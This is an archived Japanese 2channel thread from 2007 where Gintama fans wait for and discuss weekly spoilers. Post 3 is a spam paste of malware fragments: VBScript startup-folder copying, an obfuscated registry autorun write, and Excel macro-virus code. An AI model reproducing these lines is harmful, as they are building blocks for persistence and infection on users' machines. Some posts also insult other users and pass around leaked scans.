2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【空知英秋】銀魂 ネタバレスレッドPart74

1 :名無しさんの次レスにご期待下さい:2007/02/06(火) 20:41:04 ID:ZpL4zNjr0
~・このスレのルール・~

†sage進行推奨
†アンチはアンチスレで
†ダウソ系の話は極力避ける
†解禁前に本スレに誤爆した奴は切腹
†コピペ荒らし・クレ厨はスルーする。
†大義を通す前にマナーを通せマナーを
†過度のキャラ萌えや腐女子の話題はスルー
†ちゃらついたダウソクレクレ厨に興味ない
†文字バレだけでヨロシ
†アニメの話題はアニメ板で
†次スレは950が立てる。スレタイはシンプルに。
†キャラ叩き・ヒロイン論争・カプ話禁止

文字バレ神→ ◆xv3PhvD28k (通称後藤さん)
(毎週木曜夜ごろ)
簡易文字バレ神→◆1finNNYePw (通称斉藤さん)
(来れる時は木曜午前)

※後藤氏はおそらくもう来られないとのこと
 新バレ神に山田氏(◆jlbZe42Wog )が加わりました

前スレ
【空知英秋】銀魂 ネタバレスレッドPart73
http://etc6.2ch.net/test/read.cgi/wcomic/1169868178/

前々スレ
【空知英秋】銀魂 ネタバレスレッドPart72
http://etc6.2ch.net/test/read.cgi/wcomic/1169215513/

前々々スレ
【空知英秋】銀魂 ネタバレスレッドPart71
http://etc6.2ch.net/test/read.cgi/wcomic/1167481632/

2 :名無しさんの次レスにご期待下さい:2007/02/06(火) 20:43:36 ID:VPAxnBSuO
2ゲトなら合格

3 :名無しさんの次レスにご期待下さい:2007/02/06(火) 20:48:49 ID:t9RzVoRu0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


4 :名無しさんの次レスにご期待下さい:2007/02/06(火) 21:12:38 ID:GIj9dULbO
>>1
乙!
でも~は取って良かったんじゃね?

5 :名無しさんの次レスにご期待下さい:2007/02/06(火) 21:19:07 ID:ZpL4zNjr0
とろうかと思ったけどうっかりそのまま貼ってしまった
次スレ立てる人に任すw

6 :名無しさんの次レスにご期待下さい:2007/02/06(火) 21:28:27 ID:7ZX8l/Hd0
>>1

7 :名無しさんの次レスにご期待下さい:2007/02/07(水) 01:15:40 ID:pY15F0lD0
もうナルトのバレがきてたんだが。早すぎじゃね?
ttp://may.2chan.net/b/src/1170772699625.jpg

8 :名無しさんの次レスにご期待下さい:2007/02/07(水) 01:18:05 ID:MAOr62RO0
ジャンプは時々土曜日に出るから気をつけろ

9 :名無しさんの次レスにご期待下さい:2007/02/07(水) 02:03:35 ID:UBUywIYVO
>>3ガッ

10 :名無しさんの次レスにご期待下さい:2007/02/07(水) 02:51:19 ID:g/AZ43E4O
土曜日か

11 :名無しさんの次レスにご期待下さい:2007/02/07(水) 07:01:40 ID:D7gC/iqc0
もうバレくるのかw

12 :名無しさんの次レスにご期待下さい:2007/02/07(水) 07:24:15 ID:7+X/AQyv0
アイシもワンピもネウロもきてた。
土曜発売だから早いんだな

13 :名無しさんの次レスにご期待下さい:2007/02/07(水) 12:05:26 ID:C0tQlWXL0

【著作権】 "JASRACは「料金徴収団体」" FLASH動画「すごいぜ!JASRAC伝説」、ネットで話題に★3

1 :☆ばぐた☆ ◆JSGFLSFOXQ @☆ばぐ太☆φ ★ :2007/02/07(水) 11:10:23 ID:???0
・日本音楽著作権協会、略してJASRACについて各種事例を挙げて「料金徴収団体」と
 称したFLASH動画「すごいぜ!JASRAC伝説」が、話題となっている。

 このFLASHで取り上げられている事例を挙げると、スナックを経営していた老人が
 ビートルズの楽曲を無断演奏していたためJASRACに訴えられ逮捕された件、
 幼稚園のクリスマス演奏会でJASRACから請求があった件、大槻ケンヂが自分で
 作詞した過去の曲の歌詞をエッセイに載せたところJASRACから請求があった件、
 などがある。また、徴収した使用料は曲の作者に渡っているわけではなく、
 その行方は謎らしい。

 このFLASHに関してのコメントは、「いい加減JASRACはつぶれるべきだよ」や
 「取った著作権料と作者への支払金を全て一般告知すべきだな…」といった
 厳しいものや、FLASHの作者を称えるものが多数を占めていた。一方、ブログでも
 「これはおかしいだろ…常識的に考えて…」などの意見が寄せられている。
 http://news.ameba.jp/2007/02/3240.php

※関連
・FLASH動画「すごいぜ!JASRAC伝説」: ttp://iiaccess.net/upload/view.php/000901.swf
・YouTube動画「すごいぜ!JASRAC伝説」: ttp://www.youtube.com/watch?v=I5anNWJkw08

14 :名無しさんの次レスにご期待下さい:2007/02/07(水) 13:02:05 ID:MAOr62RO0
キョンと長門出てきて吹いた

15 :名無しさんの次レスにご期待下さい:2007/02/07(水) 13:36:39 ID:fweCNS+uO
バレ来ないな〜
神様…哀れな住人にバレを恵んでやって下され

16 :名無しさんの次レスにご期待下さい:2007/02/07(水) 15:21:53 ID:M4i88OyM0
仕事を首になったから探して欲しいというおっさんが万事屋を訪れる。
なんやかんやでおっさん罵倒しながらおっさんの仕事探しを一緒に手伝う3人。
源外、真選組、すまいるを訪れるがどれもおっさんのわがままで駄目。
だめもとでかまっ娘に行くと、そこに息子がいたおっさん。
なんやかんやで一緒にソコで働くようになって終わり。


「今週も親子喧嘩?どんだけネタねーんだよ」に笑った。

今回初めてだけど斎藤さんってすごいな。
一話を要約して伝えるの難しいわ。

17 :名無しさんの次レスにご期待下さい:2007/02/07(水) 15:23:42 ID:C0tQlWXL0
親子喧嘩が空知のブームなのかな。それともネタがないのか。
それとも空知自身が親子喧嘩中なのか。

18 :名無しさんの次レスにご期待下さい:2007/02/07(水) 15:26:16 ID:NjgG2eE0O
>>16
どのページでもいいからうp
携帯カメラでいいから

19 :名無しさんの次レスにご期待下さい:2007/02/07(水) 15:31:51 ID:LjZffZ+A0
パピーvs兄ちゃんの布石とか

20 :名無しさんの次レスにご期待下さい:2007/02/07(水) 15:32:49 ID:8m1CLdVS0
アゴ美の親父キターw


だといいな

21 :名無しさんの次レスにご期待下さい:2007/02/07(水) 15:36:39 ID:M4i88OyM0
ちょっと待ってて。
準備する。

22 :名無しさんの次レスにご期待下さい:2007/02/07(水) 15:36:53 ID:NbtpsLye0
乙です
まさかの3週連続天丼ワロスwww

23 :名無しさんの次レスにご期待下さい:2007/02/07(水) 15:47:03 ID:pY15F0lD0
画をうpして本物だったら信じよう

24 :名無しさんの次レスにご期待下さい:2007/02/07(水) 16:18:34 ID:MAOr62RO0
嘘バレでも本バレでもおっさんのわがままで駄目にわろた
なんか超カオス

25 :名無しさんの次レスにご期待下さい:2007/02/07(水) 17:01:09 ID:pjlnD/7R0
>16は嘘バレだったな。「なんやかんや」が入ると大概嘘バレだ。

26 :名無しさんの次レスにご期待下さい:2007/02/07(水) 17:03:48 ID:C0tQlWXL0
なんやかんやっていつも使ってる人がいつも嘘バレ書いているんじゃ

27 :名無しさんの次レスにご期待下さい:2007/02/07(水) 17:10:24 ID:hjK1d8OuO
掲載2番でも本バレがこないってちと寂しいな…

28 :名無しさんの次レスにご期待下さい:2007/02/07(水) 17:37:39 ID:dcFN9pUu0
そしてもう二度と>>21の姿を見たものはいなかったのである…

29 :名無しさんの次レスにご期待下さい:2007/02/07(水) 17:40:28 ID:biHIlVrM0
文字バレスレより転載

86 名前:暇人 ◆oDYN/1uR6o [sage] 投稿日:2007/02/07(水) 16:56:07 ID:???
>>49
ちなみに銀魂は、とあるスナイパーと銀の話

スナイパーがスコープから見た銀の色々な動きを1人突っ込みしてます
最後はスナイパーの居るマンションかそこらの更に上階で飛び降り自殺をしようとする女性をスナイパー自身が助けて

スナイパーが表彰されます

スナイパー「ま、いっか」
で、終わり

詳しくは専属バレ氏さんが書いてくれるでしょう

30 :名無しさんの次レスにご期待下さい:2007/02/07(水) 17:45:24 ID:M4i88OyM0
なんかごめん。うん。ごめん。
ぶっちゃけここで嘘バレやってるの大概俺。
本バレ、リアルタイム杉じゃ…。

31 :名無しさんの次レスにご期待下さい:2007/02/07(水) 17:45:40 ID:LjZffZ+A0
銀さんヲチ話か

32 :名無しさんの次レスにご期待下さい:2007/02/07(水) 17:46:18 ID:pY15F0lD0
銀時が殺し屋に狙われる話なのだろうか

33 :名無しさんの次レスにご期待下さい:2007/02/07(水) 17:49:07 ID:C0tQlWXL0
殺し屋に依頼した黒幕は誰だって事で大波の長編に繋がるとか?w

34 :名無しさんの次レスにご期待下さい:2007/02/07(水) 17:53:00 ID:ugQElFleO
真のゴルゴ登場か

35 :名無しさんの次レスにご期待下さい:2007/02/07(水) 18:12:31 ID:tImkvCboO
だいたい仕事捜すにしたって真選組にゃ行かないだろうよw

36 :名無しさんの次レスにご期待下さい:2007/02/07(水) 18:14:48 ID:dcFN9pUu0
だーよーねーぇ。

37 :名無しさんの次レスにご期待下さい:2007/02/07(水) 18:18:43 ID:M4i88OyM0
1分2秒で考えた糞ネタだからあんま突っ込まないで…
でも懲りずにまたやると思う、俺。

38 :名無しさんの次レスにご期待下さい:2007/02/07(水) 18:36:15 ID:MpA6bMW70
>>37やるなよ

39 :名無しさんの次レスにご期待下さい:2007/02/07(水) 18:36:44 ID:E0uNGryBO
嘘バレにしても質が低いからつまらん

40 :名無しさんの次レスにご期待下さい:2007/02/07(水) 18:58:46 ID:6y8HQFiP0
ゴルゴ転載してくれた椰子乙。嘘バレ氏も乙。
結構釣られかかった俺…なんやかんやで修行が足りないのであった

41 :名無しさんの次レスにご期待下さい:2007/02/07(水) 19:10:16 ID:s0CUCndy0
>>37
まあまあ面白かったよ
最後の2行がほんとっぽくて騙された

42 :名無しさんの次レスにご期待下さい:2007/02/07(水) 20:02:14 ID:NVUSWd670
工エエェェ(´д`)ェェエエ工

43 :名無しさんの次レスにご期待下さい:2007/02/07(水) 20:03:39 ID:7gRPuLEx0
銀時をオチするまでの経緯が気になるな

44 :名無しさんの次レスにご期待下さい:2007/02/07(水) 20:47:04 ID:pY15F0lD0
コメントバレ
295 11号(1) ◆Ijbg3iR4eg sage 2007/02/07(水) 20:22:02 ID:VaWG90oWO

墨攻が見たい。忙しくて映画を
見る暇が中々ないですが今回
は何とか見にいきます<英秋>

録画したタモリ倶楽部をだらだらと見な
がらサッカーマガジンをめくり、ビールを
飲んでる時間が何よりの幸福です<大西>

45 :名無しさんの次レスにご期待下さい:2007/02/07(水) 20:51:42 ID:s0CUCndy0
>>44
大西ひでーwwww
嫌がらせとしか思えないコメントだ

46 :名無しさんの次レスにご期待下さい:2007/02/07(水) 21:05:25 ID:vA0wxamT0
>>38
大西・・・なんて担当だw漫画家が忙しくて映画を見に行く暇も無いってのに


47 :名無しさんの次レスにご期待下さい:2007/02/07(水) 21:08:08 ID:vA0wxamT0
>>44
大西さん?

48 :名無しさんの次レスにご期待下さい:2007/02/07(水) 21:21:13 ID:M4i88OyM0
大西氏ねwwwwwwwwww

49 :名無しさんの次レスにご期待下さい:2007/02/07(水) 21:21:52 ID:OHv8s6ld0
嘘バレと本バレの見分け方がよくわからん

50 :名無しさんの次レスにご期待下さい:2007/02/07(水) 21:32:59 ID:xTQAKYJu0
墨攻は見たいと思ってたんだが空知はやっぱり歴史好きなんだな


51 :名無しさんの次レスにご期待下さい:2007/02/07(水) 21:34:12 ID:M4i88OyM0
銀魂の影響で木村幸比古読み漁ってる。
今は吉田松陰。

52 :名無しさんの次レスにご期待下さい:2007/02/07(水) 21:45:46 ID:LrusaxbhO
墨功てそんなに面白いのか・・?
http://blog.m.livedoor.jp/tsubuanco/c.cgi?sss=stseugroodevil&id=50912325
なんか微妙な感じするけど

53 :名無しさんの次レスにご期待下さい:2007/02/07(水) 21:51:00 ID:X9QF9I24O
銀魂読み始めてから、すごい時代劇とか武士の映画が
気になるようになった。墨攻も絶対見たい。
銀魂に近いものを感じた。

54 :名無しさんの次レスにご期待下さい:2007/02/07(水) 21:52:43 ID:LjZffZ+A0
御家人斬九郎とか、ツボかもな。

55 :名無しさんの次レスにご期待下さい:2007/02/07(水) 21:57:12 ID:fweCNS+uO
長州ファイブは見ないのか…

56 :名無しさんの次レスにご期待下さい:2007/02/07(水) 22:40:10 ID:C0tQlWXL0
さすがにあんなもん見ない

57 :名無しさんの次レスにご期待下さい:2007/02/07(水) 22:44:42 ID:hu5jwphY0
銀時ヲチって
ずっとゴロゴロしながらジャンプ読んで鼻くそほじってあくびして
甘いもの食ってうたた寝してそのまま1日が終わりそうな気がする

58 :名無しさんの次レスにご期待下さい:2007/02/07(水) 23:02:23 ID:67M6eT5WO
空知、ゲストキャラなしじゃ話作れないのかな

59 :名無しさんの次レスにご期待下さい:2007/02/07(水) 23:12:57 ID:p7Bubv510
もっと出せるキャラいっぱいいるのに
思い出せ、空知
あんなのやこんなのや・・・

60 :名無しさんの次レスにご期待下さい:2007/02/07(水) 23:14:51 ID:MAOr62RO0
まあ確かにいくらでもネタに出来る過去キャラは多いんだけどなぁ
まだ使いたくないとか

61 :名無しさんの次レスにご期待下さい:2007/02/07(水) 23:17:22 ID:YWStv+LvO
とりあえず坂本を思い出せ空知

62 :名無しさんの次レスにご期待下さい:2007/02/07(水) 23:18:50 ID:MpA6bMW70
詳細バレはまだか

63 :名無しさんの次レスにご期待下さい:2007/02/07(水) 23:22:07 ID:hjK1d8OuO
漫画に女っ気が全く無いな

64 :名無しさんの次レスにご期待下さい:2007/02/07(水) 23:23:41 ID:6y8HQFiP0
確かに…今週のアレだって女っつーかメスだもんな…

65 :名無しさんの次レスにご期待下さい:2007/02/07(水) 23:25:02 ID:1F6EPiFAO
確かに
ハタ皇子とか使い易そうなキャラだし表紙にいるのに2年近く出てないな
お通ちゃんも出なさすぎ 危うく新八がファンでオタ仲間(軍曹やタカチン)がいるって事を忘れる所だったよ…
あと辰巳や阿音&百音も使い易そうだから使ってほしい
ついでに海老名さんやそよ姫(勿論将軍とセットでw)やよっちゃんや武蔵や海のオヤジや坂本&陸奥やサンタ&ベンも

66 :名無しさんの次レスにご期待下さい:2007/02/07(水) 23:27:55 ID:PX+5BRFFO
アレだ
コミクスのハガキキャラのなんとかっつー人面犬
アレ出して欲しいわ


67 :名無しさんの次レスにご期待下さい:2007/02/07(水) 23:28:19 ID:NjgG2eE0O
坂本ってこち亀でいう日暮ポジだろ

68 :名無しさんの次レスにご期待下さい:2007/02/07(水) 23:29:18 ID:MpA6bMW70
63>>まぁこないだのミツバ辺は結構純愛(悲恋だけど)?だったからじゃね?

今の銀魂は原点に戻りつつある。
再来週ぐらいからまたシリアス来るのかな

69 :名無しさんの次レスにご期待下さい:2007/02/07(水) 23:30:00 ID:hu5jwphY0
銀時ヲチっつーか殺し屋が狙ってたっていうのは
マジで銀時を殺そうとしてたんだろうか
てことは今後の長編に繋がってく?

70 :名無しさんの次レスにご期待下さい:2007/02/07(水) 23:32:25 ID:Y3a/B8Ww0
つうか殺そうとしてた割にまいっかですませてしまう辺り
どういうことなのかと

71 :名無しさんの次レスにご期待下さい:2007/02/07(水) 23:32:27 ID:x//eKsnW0
殺し屋がヲチって土方のやつとかぶるな

72 :名無しさんの次レスにご期待下さい:2007/02/07(水) 23:32:28 ID:1F6EPiFAO
俺(と大西)が今思いつくだけでも
・そよ姫の政略結婚
・万事屋3人+αで室内プール(夏)
・よっちゃん→神楽の片思い
・かぶき町大運動会
この辺は既出キャラでできる

73 :名無しさんの次レスにご期待下さい:2007/02/07(水) 23:34:21 ID:hu5jwphY0
>>71
土方だったら一応理由あるじゃん
一応「真選組の頭脳w」だし。
だけど銀時じゃあ理由ないじゃん
単なる町の便利屋だもん。

74 :名無しさんの次レスにご期待下さい:2007/02/07(水) 23:35:43 ID:NjgG2eE0O
依頼主気になるよな

75 :名無しさんの次レスにご期待下さい:2007/02/07(水) 23:37:25 ID:hjK1d8OuO
暇人氏が銀魂読んでないっつーのがバレ待ちには痛いな…今回は時間あったから軽くバレしてくれたみたいだが
斎藤さん等のバレ氏も色々他の予定もあるだろうしなぁ

76 :名無しさんの次レスにご期待下さい:2007/02/07(水) 23:38:45 ID:HAs334cP0
>>72
ロリコン乙w

分かるんだ

だって僕も君と同じだから!

77 :名無しさんの次レスにご期待下さい:2007/02/07(水) 23:39:56 ID:MqS3QPsDO
裏柳生の死闘は本気で見たい
あの柳生四人と、それに相当する裏四人なら
天丼使いまくって一話完結でかなりクオリティ高い話になると思う

78 :名無しさんの次レスにご期待下さい:2007/02/07(水) 23:40:55 ID:E0uNGryBO
幾松姉さん出てくれよ

79 :名無しさんの次レスにご期待下さい:2007/02/07(水) 23:42:45 ID:MpA6bMW70
>>72
・よっちゃん→神楽の片思い
の部分地味にワロタ

80 :名無しさんの次レスにご期待下さい:2007/02/07(水) 23:46:00 ID:OoMrtJVt0
いやいや陸奥姉さんが先だよ

81 :名無しさんの次レスにご期待下さい:2007/02/07(水) 23:50:26 ID:xTQAKYJu0
いやいやハジが先だよ

82 :名無しさんの次レスにご期待下さい:2007/02/07(水) 23:51:34 ID:67M6eT5WO
江戸ならやっぱスナイパーよりも必殺仕事人にすべきだろw
さっちゃんに銀さん暗殺依頼→やっぱ無理〜みたいな。

今更だけど銀魂は和と洋が交ざりすぎてわけわからんことになるな
銀時や新八は寺子屋出身なのに学校の給食風景とかわかんのかよw

83 :名無しさんの次レスにご期待下さい:2007/02/07(水) 23:54:41 ID:1F6EPiFAO
>>76
いや、くびれがなきゃ女じゃないよ
>>79
全国の娘は〜でそんな感じがした

84 :名無しさんの次レスにご期待下さい:2007/02/07(水) 23:54:44 ID:lK9TSsuR0
寺子屋にも給食があるんだよ。

85 :名無しさんの次レスにご期待下さい:2007/02/07(水) 23:56:24 ID:p7Bubv510
>>82
それ言っちゃだめだって
江戸にターミナルなんてないしなw




86 :名無しさんの次レスにご期待下さい:2007/02/07(水) 23:57:07 ID:z/NCq5al0
>>82
さっちゃんならむしろその依頼人を殺しに行くよ

87 :名無しさんの次レスにご期待下さい:2007/02/08(木) 00:04:46 ID:hu5jwphY0
まあ実際の江戸時代の寺子屋では
昼飯はいったん自分の家帰って食ってきたんだけどなw

88 :名無しさんの次レスにご期待下さい:2007/02/08(木) 00:06:25 ID:7BpZmzYe0
来週は久しぶりのコケか?

89 :名無しさんの次レスにご期待下さい:2007/02/08(木) 00:07:18 ID:dRaQRTg40
>>82
むしろ現代と江戸とが交ざってると考えたほうがいい

90 :名無しさんの次レスにご期待下さい:2007/02/08(木) 00:11:34 ID:uqcf0Ya6O
銀さん達の寺子屋は給食より弁当な感じだな
高杉とヅラはお坊ちゃん風だったが銀さん昔から貧乏くせえw
具のないおにぎり食ってそうだ

91 :名無しさんの次レスにご期待下さい:2007/02/08(木) 00:13:58 ID:0+TuZPRF0
>>81
ハジはたまさん編で出ただろw


92 :名無しさんの次レスにご期待下さい:2007/02/08(木) 00:15:01 ID:6tjTRgcKO
外観が江戸のまま発展した未来の図なんだろうけどバランスがうまく噛み合ってないな

93 :名無しさんの次レスにご期待下さい:2007/02/08(木) 00:15:47 ID:kiXJQ7nW0
寺子屋の裏山が銀さんのお弁当箱でした

94 :名無しさんの次レスにご期待下さい:2007/02/08(木) 00:21:56 ID:IJbFLa8Q0
銀さんは松陽先生に養ってもらってたんじゃねえの?
だから一番世界を憎んでるっていう表現されたんじゃねえかと。

95 :名無しさんの次レスにご期待下さい:2007/02/08(木) 00:28:06 ID:kiXJQ7nW0
>>94
多分そう。だとしたら>>90の具のないおにぎり食ってそうww

96 :名無しさんの次レスにご期待下さい:2007/02/08(木) 00:30:56 ID:Z1aaT0tL0
松下村塾(仮)は寺子屋じゃないよ。たぶん。


97 :名無しさんの次レスにご期待下さい:2007/02/08(木) 00:36:52 ID:w2PR5yD80
これ以上新キャラ出ても疲れるしいい加減話進んでほしいよ空知

98 :名無しさんの次レスにご期待下さい:2007/02/08(木) 00:37:03 ID:ifGe/GYo0
松陽先生おにぎりに具いれてやれよw
もしかしたらサッカーボールおにぎりかもな

99 :名無しさんの次レスにご期待下さい:2007/02/08(木) 00:39:33 ID:dRaQRTg40
ラーメンこぼして捨てたのって教科書みたいなもんだろ?
勉強しながら食べてたのかよw

100 :名無しさんの次レスにご期待下さい:2007/02/08(木) 00:44:50 ID:kiXJQ7nW0
銀時「高杉んちはおにぎりに具入ってる上にゴマと海苔ついてるのにな〜いいな〜」
松陽「よそはよそ!ウチはウチ!」

101 :名無しさんの次レスにご期待下さい:2007/02/08(木) 00:46:39 ID:r1vgkNgp0
バレまだー?

102 :名無しさんの次レスにご期待下さい:2007/02/08(木) 00:50:24 ID:uqcf0Ya6O
高杉はから揚げ弁当、ヅラはシャケ弁当、銀さんだけ具のないおにぎりw
貧乏って嫌だね

103 :名無しさんの次レスにご期待下さい:2007/02/08(木) 00:56:37 ID:5M3YIe6FO
腐女子ってどうしてこう…ね?

104 :名無しさんの次レスにご期待下さい:2007/02/08(木) 01:02:47 ID:kiXJQ7nW0
知るかヴォケ
…に入る言葉を具体的に言ってみろよ?
的確に表現できるだけのボキャブラリーあんのか?

105 :名無しさんの次レスにご期待下さい:2007/02/08(木) 01:04:05 ID:r1vgkNgp0
まぁ落ち着けよ

106 :名無しさんの次レスにご期待下さい:2007/02/08(木) 01:04:23 ID:Z1aaT0tL0
具はないけど、あんこがまぶしてあるすごいおにぎり。
それが銀時のお弁当だ。

107 :名無しさんの次レスにご期待下さい:2007/02/08(木) 01:05:35 ID:bIfZptVxO
おにぎりなんてどうでもいー
それよりバレくれ
なんで銀さんに刺客きてんだ

108 :名無しさんの次レスにご期待下さい:2007/02/08(木) 01:06:14 ID:kiXJQ7nW0
467 :名無しかわいいよ名無し :2007/02/07(水) 21:03:36 ID:vAGmoJue
>>461
あ〜俺>>473-443の中に入ってるわ…orz

土方が乗る真選組のパトカーに乗りたいんだか
その為に捕まるのも嫌だから今度タクシーで土方と
そのパトカー追おうかな
だいたい土方の好みの女性のタイプが
“マヨネーズみたいな女性”って何なんだよ

↑こいつキモい。死ね

109 :名無しさんの次レスにご期待下さい:2007/02/08(木) 01:06:44 ID:+24zsTgdO
おにぎりの中にブルーベリージャム

110 :名無しさんの次レスにご期待下さい:2007/02/08(木) 01:07:49 ID:S/yVSmiD0
>>104
こう「住みわけもせず堂々と腐臭を撒き散らして人を不愉快にさせるんだろう」ね

具体的に言ってやったけど?

111 :名無しさんの次レスにご期待下さい:2007/02/08(木) 01:11:30 ID:Z1aaT0tL0
ジャムご飯はやったことあるよ。
バターライスにしたタイ米にまぜまぜするとすごくおいしい。

112 :名無しさんの次レスにご期待下さい:2007/02/08(木) 01:11:44 ID:k9g51xGxO
カレーにスルーメ

113 :名無しさんの次レスにご期待下さい:2007/02/08(木) 01:13:29 ID:kiXJQ7nW0
バレ待ちにおにぎりの話をして何が悪い
どうせ女っぽい文だったから腐!腐!ってつっかかってるだけだろ?
ありもしない臭い嗅ぎ取るお前等の感覚器官が腐ってんのに気付け低脳

114 :名無しさんの次レスにご期待下さい:2007/02/08(木) 01:14:49 ID:19dcj/4zO
斉藤さんは今ごろ何してるのかな〜
彼女作れないわ合コン出来ないわカメラに追われるわ…
十代にはさぞかし辛いだろうよ

115 :名無しさんの次レスにご期待下さい:2007/02/08(木) 01:17:54 ID:vAEh1DYp0
>>113
おにぎりとバレに何の関係もないだろ?

116 :名無しさんの次レスにご期待下さい:2007/02/08(木) 01:18:09 ID:5M3YIe6FO
あ、今週は文字バレできないかもしれないです 先週ちょっとキツかったんで…
一応体力あったらできる限りやってみますが、多分また深夜までかかります…

117 :名無しさんの次レスにご期待下さい:2007/02/08(木) 01:19:32 ID:Z1aaT0tL0
乙です!
お気持ちはありがたくも、無理はしないでくださいね。


118 :名無しさんの次レスにご期待下さい:2007/02/08(木) 01:21:39 ID:4DYL1igd0
跡部ブサイク景吾

119 :名無しさんの次レスにご期待下さい:2007/02/08(木) 01:23:04 ID:bIfZptVxO
>>116
先週はありがとうございました
すげー大変そうだったので無理しないでいいですよ
また気が向いたらお願いします

120 :名無しさんの次レスにご期待下さい:2007/02/08(木) 01:23:59 ID:kiXJQ7nW0
関係ない話なら今までもいっぱいあった。文が女っぽいだけでどうしてこうも腐と騒ぐのか。いい加減にしてくれマジウゼェ
>>116超乙だけど

121 :名無しさんの次レスにご期待下さい:2007/02/08(木) 01:24:14 ID:X7kQsBxx0
>>116
先週はホントお疲れ様でした

122 :名無しさんの次レスにご期待下さい:2007/02/08(木) 01:29:41 ID:kiXJQ7nW0
自分たまに厨行為したくなるんだ。
厨学生はもう寝るわ。おやすみ

123 :名無しさんの次レスにご期待下さい:2007/02/08(木) 01:32:40 ID:k9g51xGxO
>>116
先週はほんとに乙でした!
ありがたいですが、お疲れなら無理しないで下さい

124 :名無しさんの次レスにご期待下さい:2007/02/08(木) 01:54:32 ID:klhTDgJmO
誰か仕切り直し頼む

125 :名無しさんの次レスにご期待下さい :2007/02/08(木) 01:56:01 ID:QyVwgQKI0
とっつぁんが来れば問題ないよな

126 :名無しさんの次レスにご期待下さい:2007/02/08(木) 02:12:34 ID:EBb36M9p0
とりあえず内容知ってる人はバレ頼む

127 :名無しさんの次レスにご期待下さい:2007/02/08(木) 02:18:21 ID:R7nKbjre0
画バレキタ━━(゚∀゚)━━!!!

128 :名無しさんの次レスにご期待下さい:2007/02/08(木) 02:19:37 ID:YzAq8Vy/0
なかなか落ちてこねー

129 :名無しさんの次レスにご期待下さい:2007/02/08(木) 02:34:47 ID:X7kQsBxx0
勘違いって面白なw

130 :名無しさんの次レスにご期待下さい:2007/02/08(木) 02:48:02 ID:uCRYymkM0
もう画バレ消しちゃった?

131 :名無しさんの次レスにご期待下さい:2007/02/08(木) 02:48:30 ID:OG9C71R10
やべー、面白いw
銀さん犯罪wwww

ていうか松平のとっつあんあぶねーな。
依頼主は攘夷派もしくは幕府内の派閥争いとかかな。

132 :名無しさんの次レスにご期待下さい:2007/02/08(木) 02:49:25 ID:m0xrEqya0
見つからぬ・・・
拡散お願いしたい

133 :名無しさんの次レスにご期待下さい:2007/02/08(木) 02:49:38 ID:X7kQsBxx0
この勘違いキャラいいな
またでてきてくれないかな

134 :名無しさんの次レスにご期待下さい:2007/02/08(木) 02:50:11 ID:YzAq8Vy/0
これ銀さん何もしてないじゃないかw

135 :名無しさんの次レスにご期待下さい:2007/02/08(木) 02:50:31 ID:xhVhgk7FO
拡散お願いします

136 :名無しさんの次レスにご期待下さい:2007/02/08(木) 02:50:58 ID:X7kQsBxx0
>>130
まだ残ってる

137 :名無しさんの次レスにご期待下さい:2007/02/08(木) 02:51:42 ID:ypSw+Y/Z0
「ここにあたった」地味にワロスw

138 :名無しさんの次レスにご期待下さい:2007/02/08(木) 02:52:06 ID:OG9C71R10
ちょっと待ってな

139 :名無しさんの次レスにご期待下さい:2007/02/08(木) 02:55:25 ID:GN+bmuYo0
パスがわからん・・・

140 :名無しさんの次レスにご期待下さい:2007/02/08(木) 02:57:08 ID:YzAq8Vy/0
パスはいつも通りだよ

141 :名無しさんの次レスにご期待下さい:2007/02/08(木) 03:00:49 ID:OG9C71R10
vip通常

142 :名無しさんの次レスにご期待下さい:2007/02/08(木) 03:02:30 ID:m0xrEqya0
>>141
拡散神d!!!

143 :名無しさんの次レスにご期待下さい:2007/02/08(木) 03:02:39 ID:LFaUj4SG0
>>141
サンクス
やっと勉強できるわ

144 :名無しさんの次レスにご期待下さい:2007/02/08(木) 03:03:01 ID:HjL1riW70
>>141
トン!!

145 :名無しさんの次レスにご期待下さい:2007/02/08(木) 03:03:50 ID:xhVhgk7FO
>>141
ddd!!!!

146 :名無しさんの次レスにご期待下さい:2007/02/08(木) 03:06:24 ID:OG9C71R10
>>143
今からかよ!もう寝なさい

147 :名無しさんの次レスにご期待下さい:2007/02/08(木) 03:06:38 ID:EBb36M9p0
パスがわからん

148 :名無しさんの次レスにご期待下さい:2007/02/08(木) 03:09:48 ID:LFaUj4SG0
>>146
いや、明日テスト・・・

149 :名無しさんの次レスにご期待下さい:2007/02/08(木) 03:11:25 ID:HjL1riW70
びっくりした。
つまんなかった。
シリアスでもないのに笑うとこ数箇所しかねー

150 :名無しさんの次レスにご期待下さい:2007/02/08(木) 03:12:02 ID:OG9C71R10
>>148
馬鹿野郎…。がんがれ…!

151 :名無しさんの次レスにご期待下さい:2007/02/08(木) 03:16:16 ID:bIfZptVxO
暇な人文字バレよろ

152 :名無しさんの次レスにご期待下さい:2007/02/08(木) 03:17:06 ID:i9FQ7XWw0
>>141
d

153 :名無しさんの次レスにご期待下さい:2007/02/08(木) 03:17:36 ID:LFaUj4SG0
>>150
おう、ってかもう今日じゃねーかw

154 :名無しさんの次レスにご期待下さい:2007/02/08(木) 03:24:29 ID:RZS884ZUO
誰か詳細文字バレ頼んだ

155 :名無しさんの次レスにご期待下さい:2007/02/08(木) 03:25:54 ID:/Elq2mi30
>>153
俺は今日就職の筆記試験

156 :名無しさんの次レスにご期待下さい:2007/02/08(木) 03:30:37 ID:0+TuZPRF0
